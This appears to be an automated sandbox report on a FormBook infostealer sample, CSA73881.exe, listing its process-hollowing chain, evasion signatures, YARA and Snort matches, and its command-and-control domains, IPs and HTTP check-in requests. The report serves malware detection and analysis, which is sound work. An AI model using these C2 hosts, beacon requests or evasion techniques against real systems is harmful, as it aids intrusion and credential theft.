Windows Analysis Report
CSA73881.exe

Overview

General Information

Sample Name: CSA73881.exe
Analysis ID: 680378
MD5: 3ed3236517a40602d654555bc912d926
SHA1: 16dc042b543fe473703e711844f508d353d6d6af
SHA256: 3702b6cfa76e492d56bd9da5f99f7ff805e32c16b3840ee66bb13a812f5d3155
Tags: exe, formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • CSA73881.exe (PID: 5724 cmdline: "C:\Users\user\Desktop\CSA73881.exe" MD5: 3ED3236517A40602D654555BC912D926)
    • InstallUtil.exe (PID: 5408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • control.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • cmd.exe (PID: 2972 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Source | Rule | Description | Author | Strings
00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      Source | Rule | Description | Author | Strings
      14.0.InstallUtil.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        14.0.InstallUtil.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        14.0.InstallUtil.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        14.0.InstallUtil.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        0.2.CSA73881.exe.ee70000.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
          No Sigma rule has matched
          Timestamp: 08/08/22-14:28:06.715465
          Source IP: 192.168.2.3
          Destination IP: 34.102.136.180
          SID: 2031412
          Source Port: 49841
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 08/08/22-14:29:11.618333
          Source IP: 192.168.2.3
          Destination IP: 103.224.182.210
          SID: 2031453
          Source Port: 49846
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 08/08/22-14:29:11.618333
          Source IP: 192.168.2.3
          Destination IP: 103.224.182.210
          SID: 2031412
          Source Port: 49846
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 08/08/22-14:28:06.715465
          Source IP: 192.168.2.3
          Destination IP: 34.102.136.180
          SID: 2031449
          Source Port: 49841
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 08/08/22-14:29:11.618333
          Source IP: 192.168.2.3
          Destination IP: 103.224.182.210
          SID: 2031449
          Source Port: 49846
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 08/08/22-14:28:06.715465
          Source IP: 192.168.2.3
          Destination IP: 34.102.136.180
          SID: 2031453
          Source Port: 49841
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: Yara match, File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: CSA73881.exe, Avira: detected
          Source: www.northpierangling.info/mh76/, Avira URL Cloud: Label: malware
          Source: www.browardhomeappraisal.com, Virustotal: Detection: 6%
          Source: segurambiental.com, Virustotal: Detection: 8%
          Source: www.segurambiental.com, Virustotal: Detection: 5%
          Source: CSA73881.exe, Joe Sandbox ML: detected
          Source: 14.0.InstallUtil.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
          Source: CSA73881.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: CSA73881.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: InstallUtil.pdb source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp

          Networking

          Source: C:\Windows\explorer.exe, Domain query: www.segurambiental.com
          Source: C:\Windows\explorer.exe, Domain query: www.browardhomeappraisal.com
          Source: C:\Windows\explorer.exe, Network Connect: 103.224.182.210 80
          Source: C:\Windows\explorer.exe, Domain query: www.esrfy.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.comgmaik.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Domain query: www.merendri.com
          Source: C:\Windows\explorer.exe, Network Connect: 75.2.26.18 80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49846 -> 103.224.182.210:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49846 -> 103.224.182.210:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49846 -> 103.224.182.210:80
          Source: C:\Windows\explorer.exe, DNS query: www.esrfy.xyz
          Source: Yara match, File source: 0.2.CSA73881.exe.ee70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Malware configuration extractor, URLs: www.northpierangling.info/mh76/
          Source: Joe Sandbox View, ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
          Source: global traffic, HTTP traffic detected: GET /mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 HTTP/1.1; Host: www.segurambiental.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 HTTP/1.1; Host: www.browardhomeappraisal.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 HTTP/1.1; Host: www.comgmaik.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View, IP Address: 103.224.182.210 103.224.182.210
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Mon, 08 Aug 2022 12:28:06 GMT; Content-Type: text/html; Content-Length: 291; ETag: "62f0fdc3-123"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: awselb/2.0; Date: Mon, 08 Aug 2022 12:28:27 GMT; Content-Type: text/html; Content-Length: 118; Connection: close; Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: CSA73881.exe, 00000000.00000002.314006871.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://google.com
          Source: CSA73881.exe, 00000000.00000000.240713040.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: http://google.com)Exvkpxtvtblcdcgising7Uvadca.Properties.Resources
          Source: CSA73881.exe, 00000000.00000002.315860973.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.314521039.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://james.newtonking.com/projects/json
          Source: control.exe, 0000001C.00000002.776382935.00000000056CF000.00000004.10000000.00040000.00000000.sdmp, String found in binary or memory: http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLz
          Source: CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
          Source: unknown, DNS traffic detected: queries for: www.merendri.com

          E-Banking Fraud

          Source: Yara match, File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: CSA73881.exe PID: 5724, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: InstallUtil.exe PID: 5408, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: control.exe PID: 3004, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: CSA73881.exe, tdt.cs, Large array initialization: sis: array initializer size 2178560
          Source: CSA73881.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
